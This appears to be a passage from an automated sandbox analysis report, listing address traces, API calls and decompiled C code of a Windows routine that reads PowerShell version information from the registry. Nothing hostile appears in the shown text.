                                                                                                                                                                                                                              0x0125869a
                                                                                                                                                                                                                              0x0125869a
                                                                                                                                                                                                                              0x0125869d
                                                                                                                                                                                                                              0x012586a2
                                                                                                                                                                                                                              0x012586a5
                                                                                                                                                                                                                              0x012586ab
                                                                                                                                                                                                                              0x012586ab
                                                                                                                                                                                                                              0x012586a2
                                                                                                                                                                                                                              0x012586b4
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012586b6
                                                                                                                                                                                                                              0x012586ce
                                                                                                                                                                                                                              0x012586d3
                                                                                                                                                                                                                              0x012586d8
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012586f0
                                                                                                                                                                                                                              0x012586f6
                                                                                                                                                                                                                              0x012586fa
                                                                                                                                                                                                                              0x0125acde
                                                                                                                                                                                                                              0x0125ace1
                                                                                                                                                                                                                              0x0125ad07
                                                                                                                                                                                                                              0x0125ad1a
                                                                                                                                                                                                                              0x0125ad20
                                                                                                                                                                                                                              0x0125ad22
                                                                                                                                                                                                                              0x0125ace3
                                                                                                                                                                                                                              0x0125ace6
                                                                                                                                                                                                                              0x0125acf5
                                                                                                                                                                                                                              0x0125acf8
                                                                                                                                                                                                                              0x0125acfa
                                                                                                                                                                                                                              0x0125ad00
                                                                                                                                                                                                                              0x0125ad02
                                                                                                                                                                                                                              0x0125ad02
                                                                                                                                                                                                                              0x0125ad24
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258700
                                                                                                                                                                                                                              0x01258703
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258703
                                                                                                                                                                                                                              0x012586fa
                                                                                                                                                                                                                              0x012586b4
                                                                                                                                                                                                                              0x012585f9
                                                                                                                                                                                                                              0x0125858a
                                                                                                                                                                                                                              0x01258553
                                                                                                                                                                                                                              0x01258553
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258553
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125abc4
                                                                                                                                                                                                                              0x0125853e
                                                                                                                                                                                                                              0x01258544
                                                                                                                                                                                                                              0x0125abfc
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125abfc
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258544

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetThreadUILanguage.KERNELBASE(00000000,00000000,?), ref: 01258492
                                                                                                                                                                                                                                • Part of subcall function 012595A0: memset.MSVCRT ref: 012595F5
                                                                                                                                                                                                                                • Part of subcall function 012595A0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003), ref: 01259618
                                                                                                                                                                                                                                • Part of subcall function 012595A0: VerSetConditionMask.KERNEL32(00000000), ref: 01259620
                                                                                                                                                                                                                                • Part of subcall function 012595A0: VerSetConditionMask.KERNEL32(00000000), ref: 01259628
                                                                                                                                                                                                                                • Part of subcall function 012595A0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 01259653
                                                                                                                                                                                                                              • GetStartupInfoW.KERNEL32(?), ref: 012584A9
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,SYSTEM\CurrentControlSet\Control\MiniNT,00000000,00020019,FFFFFFFF,?,00000000,FFFFFFFF,FFFFFFFF,FFFFFFFF,00000000,?,00000000,?,?), ref: 01258530
                                                                                                                                                                                                                              • _itow_s.MSVCRT ref: 0125861B
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,FFFFFFFF,00000000,00020019,00000003,?,?,?,?,?,00000000), ref: 0125867F
                                                                                                                                                                                                                              • free.MSVCRT(FFFFFFFF,?,?,?,?,?,00000000), ref: 01258695
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000003,?,?,?,?,?,00000000), ref: 012586A5
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,00000002,00000000,00020019,00000000), ref: 012586F0
                                                                                                                                                                                                                              • RegQueryValueExW.KERNELBASE(00000000,NetFrameworkV4IsInstalled,00000000,00000000,00000000,00000000), ref: 01258719
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 0125872F
                                                                                                                                                                                                                              • free.MSVCRT(FFFFFFFF,?,?,?,?,?,00000000), ref: 01258744
                                                                                                                                                                                                                              • free.MSVCRT(00000000,?,?,?,?,?,00000000), ref: 01258786
                                                                                                                                                                                                                              • free.MSVCRT(00000000,?,?,?,?,?,00000000), ref: 01258795
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,FFFFFFFF,FFFFFFFF,FFFFFFFF,00000000,?,00000000,?,?), ref: 012587BF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • SYSTEM\CurrentControlSet\Control\MiniNT, xrefs: 01258526
                                                                                                                                                                                                                              • Start, xrefs: 01257F9F
                                                                                                                                                                                                                              • SOFTWARE\Microsoft\PowerShell\%1!ls!, xrefs: 01258652
                                                                                                                                                                                                                              • SOFTWARE\Microsoft\PowerShell\%1!ls!\PowerShellEngine, xrefs: 012586C4
                                                                                                                                                                                                                              • wks, xrefs: 01257C02
                                                                                                                                                                                                                              • NetFrameworkV4IsInstalled, xrefs: 01258711, 0125AD79
                                                                                                                                                                                                                              • Microsoft.PowerShell.UnmanagedPSEntry, xrefs: 01257E33
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$ConditionMaskOpen$CloseInfo$FreeLanguageLibraryQueryStartupThreadValueVerifyVersion_itow_smemset
                                                                                                                                                                                                                              • String ID: Microsoft.PowerShell.UnmanagedPSEntry$NetFrameworkV4IsInstalled$SOFTWARE\Microsoft\PowerShell\%1!ls!$SOFTWARE\Microsoft\PowerShell\%1!ls!\PowerShellEngine$SYSTEM\CurrentControlSet\Control\MiniNT$Start$wks
                                                                                                                                                                                                                              • API String ID: 1592770027-3807573465
                                                                                                                                                                                                                              • Opcode ID: b58177662dd652ff1eaaaa967d964241f1c72bc3a5efa5ce9e9da13e69208484
                                                                                                                                                                                                                              • Instruction ID: aad9c9824e687b739c03aff1b68c6070e379495aa5d59ecf934915b47fc1b40d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b58177662dd652ff1eaaaa967d964241f1c72bc3a5efa5ce9e9da13e69208484
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3F19071E20209ABDF65DFA9DC85BEEBBB8EF48311F044119EE11B7294D7B0A845CB50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 01258850, Relevance: 40.8, APIs: 18, Strings: 5, Instructions: 513registrywindowCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 69%
                                                                                                                                                                                                                              			E01258850(void** _a4, void** _a8, intOrPtr _a12, void* _a16, void* _a24) {
				signed int _v8;
				char _v32;
				intOrPtr _v44;
				wchar_t* _v48;
				wchar_t* _v52;
				char _v53;
				short _v60;
				wchar_t* _v64;
				wchar_t* _v68;
				void* _v72;
				void* _v76;
				wchar_t* _v80;
				long _v84;
				void** _v88;
				void** _v92;
				void* _v96;
				void* _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t113;
				void** _t115;
				void* _t116;
				void* _t118;
				void* _t119;
				long _t120;
				intOrPtr* _t126;
				void* _t129;
				void* _t131;
				intOrPtr* _t133;
				wchar_t* _t137;
				long _t142;
				signed int _t145;
				long _t151;
				intOrPtr _t153;
				void* _t154;
				void* _t155;
				intOrPtr* _t156;
				signed int _t159;
				long _t165;
				void* _t167;
				void* _t168;
				void* _t172;
				void* _t174;
				intOrPtr* _t178;
				void* _t187;
				void* _t188;
				void* _t189;
				void* _t191;
				intOrPtr* _t196;
				void* _t201;
				void* _t202;
				void** _t203;
				wchar_t* _t214;
				signed int _t220;
				short _t221;
				wchar_t* _t222;
				wchar_t* _t231;
				signed short* _t232;
				void* _t233;
				intOrPtr* _t234;
				void* _t236;
				wchar_t* _t240;
				intOrPtr* _t245;
				signed int _t248;
				void* _t249;
				void* _t250;

				_t113 =  *0x1260358; // 0xc21f7063
				_v8 = _t113 ^ _t248;
				_t203 = _a4;
				_t115 = _a8;
				_t229 = _a16;
				_t235 = _a24;
				_t202 = 0;
				_t231 = 0;
				_v92 = _t203;
				_v88 = _t115;
				_v96 = _t229;
				_v100 = _t235;
				_v72 = 0;
				_v53 = 1;
				_v80 = 0;
				_v48 = 0;
				if(_t203 == 0 || _t115 == 0 || _t229 == 0 || _t235 == 0) {
					_t116 = 0xfffb0000;
					goto L52;
				} else {
					_t236 =  *_t203;
					_v52 = 0;
					_v60 = _t236;
					if(_t236 != 0) {
						_t229 =  *_t115;
						_v64 = 0;
						_t118 = E01259200(_t236);
						__eflags = _t118;
						if(_t118 != 0) {
							L80:
							_t235 = 0xfffb0000;
							_v52 = 0xfffb0000;
							L6:
							if(_t235 != 0) {
								_v53 = 0;
								L44:
								if(_t202 != 0) {
									free(_t202);
									_t249 = _t249 + 4;
									_t202 = 0;
								}
								if(_t231 != 0) {
									free(_t231);
									_t249 = _t249 + 4;
								}
								if(_v53 == 0) {
									L51:
									_t116 = _t235;
									goto L52;
								} else {
									_t119 = _v72;
									if(_t119 == 0) {
										goto L51;
									}
									_t120 = RegCloseKey(_t119); // executed
									if(_t120 != 0) {
										_v60 = 0;
										_t235 = FormatMessageW(0x1100, 0, _t120, 0,  &_v60, 0, 0);
										__eflags = _t235;
										if(_t235 != 0) {
											_t101 = _t235 + 1; // 0x1
											_t229 = _t101 * 2 >> 0x20;
											_t231 = E0125972E( ~(0 | __eflags > 0x00000000) | _t101 * 0x00000002);
											_t250 = _t249 + 4;
											__eflags = _t231;
											if(_t231 != 0) {
												_t109 = _t235 + 1; // 0x1
												_t229 = _t109;
												_t129 = E0125CE50(_t231, _t109, _v60);
												__eflags = _t129;
												if(_t129 < 0) {
													_t235 = 0;
													free(_t231);
													_t250 = _t250 + 4;
													_t231 = 0;
													__eflags = 0;
												}
											}
											LocalFree(_v60);
											__eflags = _t235;
											if(_t235 != 0) {
												_t126 =  *0x12606d4; // 0x0
												_t235 =  *( *_t126 + 4);
												 *0x1261204(_t126, 0, 0x15, _t202, _t231);
												 *( *( *_t126 + 4))();
												__eflags = _t231;
												if(_t231 != 0) {
													free(_t231);
												}
											}
										}
										_t116 = _v52;
										L52:
										return E01259A40(_t116, _t202, _v8 ^ _t248, _t229, _t231, _t235);
									}
									goto L51;
								}
							}
							_t131 = E01258C90(_t202, _v72, L"PowerShellVersion", _t202,  &_v48); // executed
							_t231 = _v48;
							if(_t131 == 0) {
								L85:
								_t235 = 0xfffb0000;
								L86:
								_v52 = _t235;
								goto L44;
							}
							if(E01259200(_t231) != 0) {
								L84:
								_t133 =  *0x12606d4; // 0x0
								 *0x1261204(_t133, 0, 0x1b, _t202, L"PowerShellVersion");
								 *((intOrPtr*)( *((intOrPtr*)( *_t133 + 4))))();
								_t249 = _t249 + 0x14;
								goto L85;
							}
							_t232 = wcschr(_t231, 0x2e);
							_t249 = _t249 + 8;
							if(_t232 == 0) {
								L83:
								_t231 = _v48;
								goto L84;
							}
							_t229 =  *_t232 & 0x0000ffff;
							_t137 = _v48;
							_t214 = _t137;
							if(_t229 >= 0x30) {
								__eflags = _t229 - 0x39;
								if(_t229 > 0x39) {
									goto L11;
								}
								goto L83;
							}
							L11:
							if(_t214 == 0) {
								goto L83;
							}
							_t229 = 0;
							if(0 ==  *_t137 || _t214 >= _t232) {
								goto L83;
							} else {
								while( *_t214 == 0x30) {
									_t214 =  &(_t214[0]);
									__eflags = _t214 - _t232;
									if(_t214 < _t232) {
										continue;
									}
									break;
								}
								if((_t232 - _t214 & 0xfffffffe) > 0x14) {
									goto L83;
								}
								_v76 = _t229;
								_t142 = wcstoul(_t214,  &_v76, 0xa);
								_t249 = _t249 + 0xc;
								_v84 = _t142;
								if(_t232 != _v76 || _t142 > 0x7fffffff) {
									goto L83;
								} else {
									_v60 = 0;
									while(1) {
										_t240 =  &(_t232[1]);
										_t232 = wcschr(_t240, 0x2e);
										_t249 = _t249 + 8;
										if(_t232 == 0) {
											break;
										}
										_t159 =  *_t232 & 0x0000ffff;
										if(_t159 >= 0x30) {
											__eflags = _t159 - 0x39;
											if(_t159 <= 0x39) {
												goto L83;
											}
										}
										if(_t240 == 0 || 0 ==  *_t240 || _t240 >= _t232) {
											goto L83;
										} else {
											while( *_t240 == 0x30) {
												_t240 =  &(_t240[0]);
												__eflags = _t240 - _t232;
												if(_t240 < _t232) {
													continue;
												}
												break;
											}
											if((_t232 - _t240 & 0xfffffffe) > 0x14) {
												goto L83;
											}
											_v68 = 0;
											_t165 = wcstoul(_t240,  &_v68, 0xa);
											_t249 = _t249 + 0xc;
											if(_t232 != _v68 || _t165 > 0x7fffffff) {
												goto L83;
											} else {
												_t220 = _v60;
												 *(_t248 + _t220 * 4 - 0x28) = _t165;
												_t221 = _t220 + 1;
												_v60 = _t221;
												if(_t221 <= 2) {
													continue;
												} else {
													goto L83;
												}
											}
										}
									}
									_t233 = wcschr(_t240, 0);
									_t249 = _t249 + 8;
									__eflags = _t233;
									if(_t233 == 0) {
										goto L83;
									}
									_t145 =  *_t233 & 0x0000ffff;
									__eflags = _t145 - 0x30;
									if(_t145 >= 0x30) {
										__eflags = _t145 - 0x39;
										if(_t145 <= 0x39) {
											goto L83;
										}
									}
									__eflags = _t240;
									if(_t240 == 0) {
										goto L83;
									}
									__eflags = 0 -  *_t240;
									if(0 ==  *_t240) {
										goto L83;
									}
									__eflags = _t240 - _t233;
									if(_t240 >= _t233) {
										goto L83;
									} else {
										while(1) {
											__eflags =  *_t240 - 0x30;
											if( *_t240 != 0x30) {
												break;
											}
											_t240 =  &(_t240[0]);
											__eflags = _t240 - _t233;
											if(_t240 < _t233) {
												continue;
											}
											break;
										}
										__eflags = (_t233 - _t240 & 0xfffffffe) - 0x14;
										if((_t233 - _t240 & 0xfffffffe) > 0x14) {
											goto L83;
										}
										_v64 = 0;
										_t151 = wcstoul(_t240,  &_v64, 0xa);
										_t249 = _t249 + 0xc;
										__eflags = _t233 - _v64;
										if(_t233 != _v64) {
											goto L83;
										}
										__eflags = _t151 - 0x7fffffff;
										if(_t151 > 0x7fffffff) {
											goto L83;
										}
										 *(_t248 + _v60 * 4 - 0x28) = _t151;
										 *_v88 = _v84;
										_t153 = _a12;
										__eflags = _t153 - 0xffffffff;
										if(_t153 != 0xffffffff) {
											__eflags = _v44 - _t153;
											if(_v44 >= _t153) {
												goto L41;
											}
											_t156 =  *0x12606d4; // 0x0
											 *0x1261204(_t156, 0, 0x1c,  *_v92);
											 *((intOrPtr*)( *((intOrPtr*)( *_t156 + 4))))();
											_t231 = _v48;
											_t249 = _t249 + 0x10;
											_t235 = 0xfffa0000;
											goto L86;
										}
										L41:
										_t154 = E01258C90(_t202, _v72, L"RuntimeVersion", _t202, _v96); // executed
										__eflags = _t154;
										if(_t154 == 0) {
											_t231 = _v48;
											goto L85;
										}
										_t155 = E01258C90(_t202, _v72, L"ConsoleHostAssemblyName", _t202, _v100); // executed
										_t231 = _v48;
										__eflags = _t155;
										if(_t155 == 0) {
											goto L85;
										} else {
											_t235 = _v52;
											goto L44;
										}
									}
								}
							}
						}
						__eflags = _t229 - 4;
						if(_t229 == 4) {
							L71:
							_t229 = 3;
							L56:
							__imp___itow_s(_t229,  &_v32, 0xb, 0xa);
							_t249 = _t249 + 0x10;
							_v52 = _t202;
							_v68 = _t202;
							_v76 = _t202;
							_t167 = E01259200(_t236);
							__eflags = _t167;
							if(_t167 != 0) {
								L74:
								_t168 = 0xfffb0000;
								_v52 = 0xfffb0000;
								L66:
								__eflags = _t168;
								if(_t168 != 0) {
									L70:
									_t235 = _v52;
									goto L6;
								}
								_t172 = E012590D0(0x12606d0, L"SOFTWARE\\Microsoft\\PowerShell\\%1!ls!\\PowerShellEngine",  &_v64,  &_v84, 0x17,  &_v32);
								_t249 = _t249 + 0x18;
								__eflags = _t172;
								if(_t172 == 0) {
									goto L80;
								}
								_t174 = RegOpenKeyExW(0x80000002, _v64, 0, 0x20019,  &_v72); // executed
								_t229 = _t174;
								__eflags = _t229;
								if(_t229 != 0) {
									_t222 = _v64;
									__eflags = _t229 - 2;
									if(_t229 != 2) {
										_t234 =  *0x12606d4; // 0x0
										 *0x1261204(_t229, 0x14, _t222);
										 *((intOrPtr*)( *((intOrPtr*)( *_t234 + 8))))();
										_t231 = _v48;
									} else {
										_t178 =  *0x12606d4; // 0x0
										__eflags = _t236;
										_t245 =  *((intOrPtr*)( *_t178 + 4));
										if(_t236 != 0) {
											 *0x1261204(_t178, 0, 0x27, _t222, _v60);
											 *_t245();
											_t249 = _t249 + 0x14;
										} else {
											 *0x1261204(_t178, 0, 0x1e, _t222);
											 *_t245();
											_t249 = _t249 + 0x10;
										}
									}
									goto L80;
								}
								_t202 = _v64;
								goto L70;
							}
							__eflags = 0 - _v32;
							if(0 == _v32) {
								goto L74;
							}
							_t187 = E012590D0(0x12606d0, L"SOFTWARE\\Microsoft\\PowerShell\\%1!ls!",  &_v68,  &_v84, 0x17,  &_v32);
							_t249 = _t249 + 0x18;
							__eflags = _t187;
							_t188 = _v68;
							if(_t187 == 0) {
								_v52 = 0xfffb0000;
							} else {
								_t191 = RegOpenKeyExW(0x80000002, _t188, 0, 0x20019,  &_v76); // executed
								__eflags = _t191;
								if(_t191 != 0) {
									asm("sbb eax, eax");
									_v52 = 0xfffa0000 + ( ~(_t191 - 2) & 0x00010000);
									_t196 =  *0x12606d4; // 0x0
									 *0x1261204(_t196, 0, 0x19, _v60);
									 *((intOrPtr*)( *((intOrPtr*)( *_t196 + 4))))();
									_t236 = _v60;
									_t249 = _t249 + 0x10;
								}
								_t188 = _v68;
							}
							__eflags = _t188;
							if(_t188 != 0) {
								free(_t188);
								_t249 = _t249 + 4;
							}
							_t189 = _v76;
							__eflags = _t189;
							if(_t189 != 0) {
								RegCloseKey(_t189);
								_v76 = _t202;
							}
							_t168 = _v52;
							goto L66;
						}
						__eflags = _t229 - 5;
						if(_t229 == 5) {
							goto L71;
						}
						goto L56;
					}
					_t201 = E01258D90( &_v72,  &_v80, _t203, _t115); // executed
					_t202 = _v80;
					if(_t201 == 0) {
						goto L80;
					}
					goto L6;
				}
			}







































































                                                                                                                                                                                                                              0x01258858
                                                                                                                                                                                                                              0x0125885f
                                                                                                                                                                                                                              0x01258862
                                                                                                                                                                                                                              0x01258865
                                                                                                                                                                                                                              0x01258868
                                                                                                                                                                                                                              0x0125886d
                                                                                                                                                                                                                              0x01258870
                                                                                                                                                                                                                              0x01258873
                                                                                                                                                                                                                              0x01258875
                                                                                                                                                                                                                              0x01258878
                                                                                                                                                                                                                              0x0125887b
                                                                                                                                                                                                                              0x0125887e
                                                                                                                                                                                                                              0x01258881
                                                                                                                                                                                                                              0x01258888
                                                                                                                                                                                                                              0x0125888c
                                                                                                                                                                                                                              0x0125888f
                                                                                                                                                                                                                              0x01258894
                                                                                                                                                                                                                              0x0125b035
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012588b2
                                                                                                                                                                                                                              0x012588b2
                                                                                                                                                                                                                              0x012588b4
                                                                                                                                                                                                                              0x012588b7
                                                                                                                                                                                                                              0x012588bc
                                                                                                                                                                                                                              0x01258b65
                                                                                                                                                                                                                              0x01258b68
                                                                                                                                                                                                                              0x01258b6b
                                                                                                                                                                                                                              0x01258b70
                                                                                                                                                                                                                              0x01258b72
                                                                                                                                                                                                                              0x0125aebf
                                                                                                                                                                                                                              0x0125aebf
                                                                                                                                                                                                                              0x0125aec4
                                                                                                                                                                                                                              0x012588dc
                                                                                                                                                                                                                              0x012588de
                                                                                                                                                                                                                              0x0125aecc
                                                                                                                                                                                                                              0x01258b18
                                                                                                                                                                                                                              0x01258b1a
                                                                                                                                                                                                                              0x01258b1d
                                                                                                                                                                                                                              0x01258b22
                                                                                                                                                                                                                              0x01258b25
                                                                                                                                                                                                                              0x01258b25
                                                                                                                                                                                                                              0x01258b29
                                                                                                                                                                                                                              0x01258b2c
                                                                                                                                                                                                                              0x01258b31
                                                                                                                                                                                                                              0x01258b31
                                                                                                                                                                                                                              0x01258b38
                                                                                                                                                                                                                              0x01258b50
                                                                                                                                                                                                                              0x01258b50
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258b3a
                                                                                                                                                                                                                              0x01258b3a
                                                                                                                                                                                                                              0x01258b3f
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258b42
                                                                                                                                                                                                                              0x01258b4a
                                                                                                                                                                                                                              0x0125af97
                                                                                                                                                                                                                              0x0125afaf
                                                                                                                                                                                                                              0x0125afb1
                                                                                                                                                                                                                              0x0125afb3
                                                                                                                                                                                                                              0x0125afb7
                                                                                                                                                                                                                              0x0125afbf
                                                                                                                                                                                                                              0x0125afce
                                                                                                                                                                                                                              0x0125afd0
                                                                                                                                                                                                                              0x0125afd3
                                                                                                                                                                                                                              0x0125afd5
                                                                                                                                                                                                                              0x0125afda
                                                                                                                                                                                                                              0x0125afda
                                                                                                                                                                                                                              0x0125afdf
                                                                                                                                                                                                                              0x0125afe4
                                                                                                                                                                                                                              0x0125afe6
                                                                                                                                                                                                                              0x0125afe9
                                                                                                                                                                                                                              0x0125afeb
                                                                                                                                                                                                                              0x0125aff0
                                                                                                                                                                                                                              0x0125aff3
                                                                                                                                                                                                                              0x0125aff3
                                                                                                                                                                                                                              0x0125aff3
                                                                                                                                                                                                                              0x0125afe6
                                                                                                                                                                                                                              0x0125aff8
                                                                                                                                                                                                                              0x0125affe
                                                                                                                                                                                                                              0x0125b000
                                                                                                                                                                                                                              0x0125b002
                                                                                                                                                                                                                              0x0125b010
                                                                                                                                                                                                                              0x0125b015
                                                                                                                                                                                                                              0x0125b01b
                                                                                                                                                                                                                              0x0125b020
                                                                                                                                                                                                                              0x0125b022
                                                                                                                                                                                                                              0x0125b025
                                                                                                                                                                                                                              0x0125b02a
                                                                                                                                                                                                                              0x0125b022
                                                                                                                                                                                                                              0x0125b000
                                                                                                                                                                                                                              0x0125b02d
                                                                                                                                                                                                                              0x01258b52
                                                                                                                                                                                                                              0x01258b62
                                                                                                                                                                                                                              0x01258b62
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258b4a
                                                                                                                                                                                                                              0x01258b38
                                                                                                                                                                                                                              0x012588f1
                                                                                                                                                                                                                              0x012588f6
                                                                                                                                                                                                                              0x012588fb
                                                                                                                                                                                                                              0x0125af03
                                                                                                                                                                                                                              0x0125af03
                                                                                                                                                                                                                              0x0125af08
                                                                                                                                                                                                                              0x0125af08
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125af08
                                                                                                                                                                                                                              0x01258909
                                                                                                                                                                                                                              0x0125aee1
                                                                                                                                                                                                                              0x0125aee1
                                                                                                                                                                                                                              0x0125aef8
                                                                                                                                                                                                                              0x0125aefe
                                                                                                                                                                                                                              0x0125af00
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125af00
                                                                                                                                                                                                                              0x01258918
                                                                                                                                                                                                                              0x0125891a
                                                                                                                                                                                                                              0x0125891f
                                                                                                                                                                                                                              0x0125aede
                                                                                                                                                                                                                              0x0125aede
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125aede
                                                                                                                                                                                                                              0x01258925
                                                                                                                                                                                                                              0x01258928
                                                                                                                                                                                                                              0x0125892b
                                                                                                                                                                                                                              0x01258930
                                                                                                                                                                                                                              0x0125aed5
                                                                                                                                                                                                                              0x0125aed8
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125aed8
                                                                                                                                                                                                                              0x01258936
                                                                                                                                                                                                                              0x01258938
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125893e
                                                                                                                                                                                                                              0x01258943
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258951
                                                                                                                                                                                                                              0x01258951
                                                                                                                                                                                                                              0x0125af10
                                                                                                                                                                                                                              0x0125af13
                                                                                                                                                                                                                              0x0125af15
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125af1b
                                                                                                                                                                                                                              0x01258965
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258970
                                                                                                                                                                                                                              0x01258975
                                                                                                                                                                                                                              0x0125897b
                                                                                                                                                                                                                              0x0125897e
                                                                                                                                                                                                                              0x01258984
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258995
                                                                                                                                                                                                                              0x01258997
                                                                                                                                                                                                                              0x012589a0
                                                                                                                                                                                                                              0x012589a0
                                                                                                                                                                                                                              0x012589ac
                                                                                                                                                                                                                              0x012589ae
                                                                                                                                                                                                                              0x012589b3
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012589b9
                                                                                                                                                                                                                              0x012589bf
                                                                                                                                                                                                                              0x0125af20
                                                                                                                                                                                                                              0x0125af23
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125af25
                                                                                                                                                                                                                              0x012589c7
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012589e0
                                                                                                                                                                                                                              0x012589e0
                                                                                                                                                                                                                              0x0125af2a
                                                                                                                                                                                                                              0x0125af2d
                                                                                                                                                                                                                              0x0125af2f
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125af35
                                                                                                                                                                                                                              0x012589f4
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012589ff
                                                                                                                                                                                                                              0x01258a08
                                                                                                                                                                                                                              0x01258a0e
                                                                                                                                                                                                                              0x01258a14
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258a25
                                                                                                                                                                                                                              0x01258a25
                                                                                                                                                                                                                              0x01258a28
                                                                                                                                                                                                                              0x01258a2c
                                                                                                                                                                                                                              0x01258a2d
                                                                                                                                                                                                                              0x01258a33
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258a39
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258a39
                                                                                                                                                                                                                              0x01258a33
                                                                                                                                                                                                                              0x01258a14
                                                                                                                                                                                                                              0x012589c7
                                                                                                                                                                                                                              0x01258a47
                                                                                                                                                                                                                              0x01258a49
                                                                                                                                                                                                                              0x01258a4c
                                                                                                                                                                                                                              0x01258a4e
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258a54
                                                                                                                                                                                                                              0x01258a57
                                                                                                                                                                                                                              0x01258a5a
                                                                                                                                                                                                                              0x0125af3a
                                                                                                                                                                                                                              0x0125af3d
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125af3f
                                                                                                                                                                                                                              0x01258a60
                                                                                                                                                                                                                              0x01258a62
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258a6a
                                                                                                                                                                                                                              0x01258a6d
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258a73
                                                                                                                                                                                                                              0x01258a75
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258a7b
                                                                                                                                                                                                                              0x01258a80
                                                                                                                                                                                                                              0x01258a80
                                                                                                                                                                                                                              0x01258a84
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125af44
                                                                                                                                                                                                                              0x0125af47
                                                                                                                                                                                                                              0x0125af49
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125af4f
                                                                                                                                                                                                                              0x01258a91
                                                                                                                                                                                                                              0x01258a94
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258a9f
                                                                                                                                                                                                                              0x01258aa8
                                                                                                                                                                                                                              0x01258aae
                                                                                                                                                                                                                              0x01258ab1
                                                                                                                                                                                                                              0x01258ab4
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258aba
                                                                                                                                                                                                                              0x01258abf
